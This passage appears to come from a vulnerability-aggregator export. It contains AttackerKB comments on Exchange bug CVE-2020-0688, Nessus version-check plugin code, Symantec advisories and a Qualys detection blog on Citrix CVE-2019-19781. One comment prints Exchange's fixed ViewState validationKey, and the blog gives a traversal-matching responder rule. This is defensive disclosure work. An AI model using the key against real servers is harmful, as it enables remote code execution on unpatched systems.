up](https://www.zerodayinitiative.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys) by ZDI outlines an exploitation path in grate detail how the vulnerability would be leveraged to gain command execution as `NT_AUTHORITY\\SYSTEM` on the server.\r\n\r\nThe root of the issue is that the `validationKey` is not randomized at installation time, resulting in Exchange servers using an attacker known value. This value can be used to submit crafted data to the server that passes validation checks and is ultimately deserialized which can result in code execution.\r\n\r\nThe important values from the write up are:\r\n``` \r\nvalidationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF\r\nvalidationalg = SHA1\r\n```\r\n\r\nI anticipate that the largest barrier to developing a PoC for this will be setting up and configuring a target environment. Exploiting this vulnerability requires authenticating as a user. The user must be a member of the `Domain Users` group and have a configured mailbox in Exchange.\r\n\r\nThew ViewState must be transfered within a GET request, POST can not be used. This introduces size restrictions on the OS command that can be executed.\n\nAssessed Attacker Value: 4\nAssessed Exploitability: 4\n**hartescout** at 2020-02-26T02:30:27.611496Z reported:\nThis one is fairly new. I will put a few quotes in here as they display my ideas of why this should be considered high priority and have better writing skills than I do, unfortunately. \r\nI was initially alerted (again) to this CVE with the Thread linked here : https://twitter.com/GossiTheDog/status/1232368620270911488\r\nI agree, enterprise environments with Internet facing Exchange. As stated in the thread, you can see a simple search with shodan.io will expose this vulnerability. There are thousands that qualify. \r\n\r\nHere is another, more formal and thorough analysis I think you will find helpful: https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys\r\n\r\nHere is a video of bug in action. \r\nhttps://youtu.be/7d_HoQ0LVy8\r\n\r\nThis is a RCE vulnerability that effects Microsoft Exchange Server. Now a patch was released, but Microsoft has not classified this as critical, so we will see how effective it is. \r\n\r\n\"Instead of having randomly-generated keys on a per-installation basis, all installations of Microsoft Exchange Server have the same validationKey and decryptionKey values in web.config. These keys are used to provide security for ViewState. ViewState is server-side data that ASP.NET web applications store in serialized format on the client. The client provides this data back to the server via the __VIEWSTATE request parameter. \"\r\n\r\nI welcome any discussion, please tell me if I missing something. I would love to hear more about this and if any Blue Team has had an incident already. \r\nTake care!\n\nAssessed Attacker Value: 5\nAssessed Exploitability: 4\n", "modified": "2020-05-30T05:00:46", "published": "2020-02-11T21:30:07", "id": "AKB:B8A2FA01-8796-4335-8BF4-45147E14AFC9", "href": "https://attackerkb.com/topics/b8a2fa01-8796-4335-8bf4-45147e14afc9", "title": "CVE-2020-0688 - Exchange Control Panel Viewstate Deserialization Bug", "type": "attackerkb", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2020-05-01T02:07:34", "bulletinFamily": "scanner", "description": "According to its self-reported version, the version of Pulse Connect Secure running on the remote host is prior to \n8.1R15.1, 8.2.x < 8.2R12.1, 8.3.x < 8.3R7.1 or 9.x prior to 9.0R3.4. It is, therefore, affected by an arbitrary file \nread vulnerability due to insufficient user input validation. An unauthenticated, remote attacker can exploit this, by \nrequesting a specially crafted URI, to read arbitrary files and disclose sensitive information.", "modified": "2020-05-02T00:00:00", "id": "PULSE_CONNECT_SECURE-CVE-2019-11510.NASL", "href": "https://www.tenable.com/plugins/nessus/127908", "published": "2019-08-16T00:00:00", "title": "Pulse Connect Secure Arbitrary File Read Vulnerability (CVE-2019-11510)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(127908);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/11/08\");\n\n script_cve_id(\"CVE-2019-11510\");\n script_bugtraq_id(108073);\n script_xref(name:\"IAVA\", value:\"2019-A-0309\");\n\n script_name(english:\"Pulse Connect Secure Arbitrary File Read Vulnerability (CVE-2019-11510)\");\n script_summary(english:\"Checks Pulse Connect Secure version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by an arbitrary file read vulnerability\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the version of Pulse Connect Secure running on the remote host is prior to \n8.1R15.1, 8.2.x < 8.2R12.1, 8.3.x < 8.3R7.1 or 9.x prior to 9.0R3.4. It is, therefore, affected by an arbitrary file \nread vulnerability due to insufficient user input validation. An unauthenticated, remote attacker can exploit this, by \nrequesting a specially crafted URI, to read arbitrary files and disclose sensitive information.\");\n # https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d23f9165\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 8.1R15.1, 8.2R12.1, 8.3R7.1, 9.0R3.4, or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-11510\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Pulse Connect Secure File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/04/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/04/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/08/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:pulse_secure:pulse_connect_secure\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"pulse_connect_secure_detect.nbin\");\n script_require_keys(\"installed_sw/Pulse Connect Secure\");\n script_require_ports(443);\n\n exit(0);\n}\n\n# Deprecated\nexit(0, 'This plugin has been deprecated. Use pulse_connect_secure-sa-44101.nasl (plugin ID 124766) instead.');\n\ninclude('vcf.inc');\n\napp_info = vcf::get_app_info(app:'Pulse Connect Secure', port:443, webapp:TRUE);\n\nconstraints = [\n {'fixed_version' : '8.1R15.1'},\n {'min_version' : '8.2' , 'fixed_version' : '8.2R12.1'},\n {'min_version' : '8.3' , 'fixed_version' : '8.3R7.1'},\n {'min_version' : '9.0' , 'fixed_version' : '9.0R3.4'},\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-04T08:45:36", "bulletinFamily": "scanner", "description": "The ManageEngine Desktop Central application running on the remote\nhost is version 10 prior to build 100479. It is, therefore, affected by\na remote code execution vulnerability.", "modified": "2020-03-19T00:00:00", "id": "MANAGEENGINE_DESKTOP_CENTRAL_100479.NASL", "href": "https://www.tenable.com/plugins/nessus/134677", "published": "2020-03-19T00:00:00", "title": "ManageEngine Desktop Central 10 < Build 100479 Remote Code Execution", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(134677);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/04/03\");\n\n script_cve_id(\"CVE-2020-10189\");\n\n script_name(english:\"ManageEngine Desktop Central 10 < Build 100479 Remote Code Execution\");\n script_summary(english:\"Checks the build number.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a Java-based web application that is\naffected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The ManageEngine Desktop Central application running on the remote\nhost is version 10 prior to build 100479. It is, therefore, affected by\na remote code execution vulnerability.\");\n # https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b517c025\");\n # https://www.manageengine.com/products/desktop-central/rce-vulnerability-cve-2020-10189.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9944baef\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ManageEngine Desktop Central version 10 build 100479 or\nlater. Alternatively, apply the manual, vendor-supplied workaround.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-10189\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ManageEngine Desktop Central Java Deserialization');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/03/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/19\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zohocorp:manageengine_desktop_central\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"manageengine_desktop_central_detect.nbin\");\n script_require_keys(\"installed_sw/ManageEngine Desktop Central\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 8020, 8383, 8040);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\n# Cannot know if manual workaround is in place.\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nappname = \"ManageEngine Desktop Central\";\nget_install_count(app_name:appname, exit_if_zero:TRUE);\n\nport = get_http_port(default:8020);\n\ninstall = get_single_install(\n app_name : appname,\n port : port,\n exit_if_unknown_ver : TRUE\n);\n\ndir = install[\"path\"];\nversion = install[\"version\"];\nbuild = install[\"build\"];\nismsp = install[\"MSP\"];\nrep_version = version;\n\ninstall_url = build_url(port:port, qs:dir);\n\nif (ismsp) appname += \" MSP\";\n\nif (build == UNKNOWN_VER)\n exit(0, \"The build number of \"+appname+\" version \" +rep_version+ \" listening at \" +install_url+ \" could not be determined.\");\nelse\n rep_version += \" Build \" + build;\n\nbuild = int(build);\nif (version =~ \"^10(\\.|$)\" && build < 100479)\n{\n report =\n '\\n URL : ' + install_url +\n '\\n Installed version : ' + rep_version +\n '\\n Fixed version : 10 Build 100479' +\n '\\n';\n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, appname, install_url, rep_version);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-03T01:56:46", "bulletinFamily": "scanner", "description": "The remote Citrix ADC or Citrix NetScaler Gateway device is affected by an arbitrary code execution vulnerability.\nAn unauthenticated, remote attacker may be able to leverage this vulnerability to perform arbitrary code execution on \nan affected host.\n\nPlease refer to advisory CTX267027 for more information.", "modified": "2020-05-02T00:00:00", "id": "CITRIX_NETSCALER_CTX267027.NASL", "href": "https://www.tenable.com/plugins/nessus/132397", "published": "2019-12-24T00:00:00", "title": "Citrix ADC and Citrix NetScaler Gateway Arbitrary Code Execution (CTX267027)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132397);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2020/01/27\");\n\n script_cve_id(\"CVE-2019-19781\");\n script_xref(name:\"IAVA\", value:\"2020-A-0001\");\n\n script_name(english:\"Citrix ADC and Citrix NetScaler Gateway Arbitrary Code Execution (CTX267027)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"\n The remote device is affected by an arbitrary code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Citrix ADC or Citrix NetScaler Gateway device is affected by an arbitrary code execution vulnerability.\nAn unauthenticated, remote attacker may be able to leverage this vulnerability to perform arbitrary code execution on \nan affected host.\n\nPlease refer to advisory CTX267027 for more information.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.citrix.com/article/CTX267027\");\n script_set_attribute(attribute:\"solution\", value:\n\"For versions 10.5.x, 11.1.x, 12.0.x, 12.1.x and 13.0.x, upgrade to 10.5.70.12, 11.1.63.15, 12.0.63.13, 12.1.55.18 and \n13.0.47.24 respectively.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-19781\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Citrix ADC (NetScaler) Directory Traversal RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:citrix:netscaler_access_gateway_firmware\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"citrix_netscaler_detect.nbin\");\n script_require_keys(\"Host/NetScaler/Detected\");\n\n exit(0);\n}\n\ninclude('audit.inc');\n\nversion = get_kb_item_or_exit('Host/NetScaler/Version');\nbuild = get_kb_item('Host/NetScaler/Build');\n\ndisplay_version = version + '-' + build;\nversion = version + '.' + build;\n\nfixed_build = NULL;\n\nif (version =~ '^10\\\\.5' && ver_compare(ver:build, fix:'70.12', strict:FALSE) == -1)\n fixed_build = '10.5-70.12';\n\nif (version =~ '^11\\\\.1' && ver_compare(ver:build, fix:'63.15', strict:FALSE) == -1)\n fixed_build = '11.1-63.15';\n\nif (version =~ '^12\\\\.0' && ver_compare(ver:build, fix:'63.13', strict:FALSE) == -1)\n fixed_build = '12.0-63.13';\n\nif (version =~ '^12\\\\.1' && ver_compare(ver:build, fix:'55.18', strict:FALSE) == -1)\n fixed_build = '12.1-55.18';\n\nif (version =~ '^13\\\\.0' && ver_compare(ver:build, fix:'47.24', strict:FALSE) == -1)\n fixed_build = '13.0-47.24';\n\nif (isnull(fixed_build))\n audit(AUDIT_INST_VER_NOT_VULN, 'Citrix NetScaler', display_version);\n\nreport =\n '\\n Installed version : ' + display_version +\n '\\n Installed build : ' + build +\n '\\n Fixed build : ' + fixed_build +\n '\\n';\n\nsecurity_report_v4(port:0, severity:SECURITY_HOLE, extra:report);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-01T00:18:03", "bulletinFamily": "scanner", "description": "Art Manion and Will Dormann report :\n\nBy using an older and less-secure form of open(), it is possible for\nuntrusted template files to cause reads/writes outside of the template\ndirectories. This vulnerability is a component of the recent Citrix\nexploit.", "modified": "2020-05-02T00:00:00", "id": "FREEBSD_PKG_2BAB995F36D411EA9DAD002590ACAE31.NASL", "href": "https://www.tenable.com/plugins/nessus/132879", "published": "2020-01-15T00:00:00", "title": "FreeBSD : Template::Toolkit -- Directory traversal on write (2bab995f-36d4-11ea-9dad-002590acae31)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2020 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(132879);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2020/01/17\");\n\n script_cve_id(\"CVE-2019-19781\");\n\n script_name(english:\"FreeBSD : Template::Toolkit -- Directory traversal on write (2bab995f-36d4-11ea-9dad-002590acae31)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Art Manion and Will Dormann report :\n\nBy using an older and less-secure form of open(), it is possible for\nuntrusted template files to cause reads/writes outside of the template\ndirectories. This vulnerability is a component of the recent Citrix\nexploit.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.kb.cert.org/vuls/id/619785/\"\n );\n # https://vuxml.freebsd.org/freebsd/2bab995f-36d4-11ea-9dad-002590acae31.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e74959bf\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Citrix ADC (NetScaler) Directory Traversal RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:p5-Template-Toolkit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"p5-Template-Toolkit<3.004\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "symantec": [{"lastseen": "2019-12-19T16:22:11", "bulletinFamily": "software", "description": "### Description\n\nMultiple Citrix Products are prone to a remote code-execution vulnerability. Successfully exploiting this issue will allow attackers to execute arbitrary code within the context of the application.\n\n### Technologies Affected\n\n * Citrix NetScaler Gateway 10.5 \n * Citrix NetScaler Gateway 11.1 \n * Citrix NetScaler Gateway 12.0 \n * Citrix NetScaler Gateway 12.1 \n * Citrix NetScaler Gateway 13.0 \n * Citrix Netscaler Application Delivery Controller 10.5 \n * Citrix Netscaler Application Delivery Controller 11.1 \n * Citrix Netscaler Application Delivery Controller 12.0 \n * Citrix Netscaler Application Delivery Controller 12.1 \n * Citrix Netscaler Application Delivery Controller 13.0 \n\n### Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nIf global access isn't needed, filter access to the affected computer at the network boundary. Restricting access to only trusted computers and networks might greatly reduce the likelihood of successful exploits.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Implement multiple redundant layers of security.** \nVarious memory-protection schemes (such as non-executable and randomly mapped memory segments) may hinder an attacker's ability to exploit this vulnerability to execute arbitrary code. \n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2019-12-17T00:00:00", "published": "2019-12-17T00:00:00", "id": "SMNTC-111238", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/111238", "title": "Multiple Citrix Products CVE-2019-19781 Remote Code Execution Vulnerability", "type": "symantec", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-02-13T00:23:16", "bulletinFamily": "software", "description": "### Description\n\nMicrosoft SharePoint Server is prone to a remote code-execution vulnerability. An attacker can leverage this issue to execute arbitrary code. Failed exploit attempts will likely result in denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft SharePoint Enterprise Server 2016 \n * Microsoft SharePoint Foundation 2013 SP1 \n * Microsoft SharePoint Server 2010 SP2 \n * Microsoft SharePoint Server 2019 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n**Do not accept or execute files from untrusted or unknown sources.** \nTo reduce the likelihood of successful exploits, never handle files that originate from unfamiliar or untrusted sources.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2019-02-12T00:00:00", "published": "2019-02-12T00:00:00", "id": "SMNTC-106914", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/106914", "title": "Microsoft SharePoint Server CVE-2019-0604 Remote Code Execution Vulnerability", "type": "symantec", "cvss": {"score": 0.0, "vector": "NONE"}}], "qualysblog": [{"lastseen": "2020-01-20T12:15:15", "bulletinFamily": "blog", "description": "**Update January 17, 2020**: A new detection in Qualys Web Application Scanning was added. See \"Detecting with Qualys WAS\" below.\n\nCitrix released a [security advisory](<https://support.citrix.com/article/CTX267027>) ([CVE-2019-19781](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19781>)) for a remote code execution vulnerability in Citrix Application Delivery Controller (ADC) and Citrix Gateway products. The vulnerability allows an unauthenticated remote attacker to execute arbitrary code on the system. Once exploited, remote attackers could obtain access to private network resources without requiring authentication.\n\nDuring the week of January 13, [attacks on Citrix appliances](<https://threatpost.com/unpatched-citrix-flaw-exploits/151748/>) have [intensified](<https://www.zdnet.com/article/a-hacker-is-patching-citrix-servers-to-maintain-exclusive-access/>). Because of the active attacks and the ease of exploitation, organizations are advised to pay close attention.\n\n### About CVE-2019-19781\n\nThe vulnerability affects all supported versions of Citrix ADC and Citrix Gateway products. As Citrix did not disclose many details about the vulnerability, the [mitigation steps](<https://support.citrix.com/article/CTX267679>) suggest the VPN handler fails to sufficiently sanitize user-supplied inputs. The exploit attempt would include HTTP requests with \u2018/../\u2019 and \u2018/vpns/\u2019 in the URL. The responder policy rule checks for string \u201c/vpns/\" and if user is connected to the SSLVPN, and sends a 403 response as seen below.\n\n_add responder policy ctx267027 \"HTTP.REQ.URL.DECODE_USING_TEXT_MODE.CONTAINS(\\\"/vpns/\\\") &amp;&amp; (!CLIENT.SSLVPN.IS_SSLVPN || HTTP.REQ.URL.DECODE_USING_TEXT_MODE.CONTAINS(\\\"/../\\\"))\" respondwith403 _\n\n### Detecting with Qualys VM\n\nQualys has issued QID 372305 for [Qualys Vulnerability Management](<https://www.qualys.com/apps/vulnerability-management/>) that includes authenticated and remote detections of vulnerabilities present in affected Citrix products. This QID is included in signature version VULNSIGS-2.4.788-2.\n\n_QID 372305 : Citrix ADC And Citrix Gateway Arbitrary Code Execution Vulnerability (CTX267027)_\n\nThe QID contains a remote and an authenticated signature to check the presence of vulnerability in Citrix Products. \nYou can search for this new QID in AssetView or within the VM Dashboard by using the following QQL query:\n\n_vulnerabilities.vulnerability.qid:372305_ \n_vulnerabilities.vulnerability.cveId:`CVE-2019-19781`_\n\nThis will return a list of all impacted hosts.\n\nYou can also create a Dashboard to track all Citrix vulnerabilities as shown in the template below:\n\n\n\n \n\n### Detecting with Qualys Threat Protection\n\nThe fastest way to locate vulnerable hosts is though the [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>) Live Feed as seen here:\n\n\n\nSimply click on the Impacted Assets number to see a list of hosts with this vulnerability.\n\n### Detecting with Qualys WAS\n\nQualys has released QID 150273 in [Qualys Web Application Scanning](<https://www.qualys.com/apps/web-app-scanning/>) (WAS) that includes a passive detection of vulnerabilities present in the affected Citrix products.\n\n_QID 150273 : Citrix ADC And Citrix Gateway Arbitrary Code Execution Vulnerability (CTX267027)_\n\nThis detection is useful for customers using Qualys WAS in their environments, and it has the advantage of detecting both at the root level of the target being scanned **and** at the starting URL of the web application as specified in the WAS configuration.\n\nThe passive detection works by sending an HTTPS request and looking for evidence of the vulnerability in the response. If the scanned application is vulnerable, the QID will be reported in your Qualys WAS scan report.\n\n### Mitigation\n\nCustomers are recommended to apply Citrix\u2019s [Mitigation Steps for CVE-2019-19781](<https://support.citrix.com/article/CTX267679>) as soon as possible.\n\nCustomers can check their systems for exploit attempts using \u201cgrep\u201d for requests that contain \u201cvpns\u201d and \u201c..\u201d.\n\nA patch is expected from Citrix by the end of January 2020, and organizations are advised to install that patch as soon as it is available.", "modified": "2020-01-09T00:12:26", "published": "2020-01-09T00:12:26", "id": "QUALYSBLOG:82E24C28622F0C96140EDD88C6BD8F54", "href": "https://blog.qualys.com/laws-of-vulnerabilities/2020/01/08/citrix-adc-and-gateway-remote-code-execution-vulnerability-cve-2019-19781", "type": 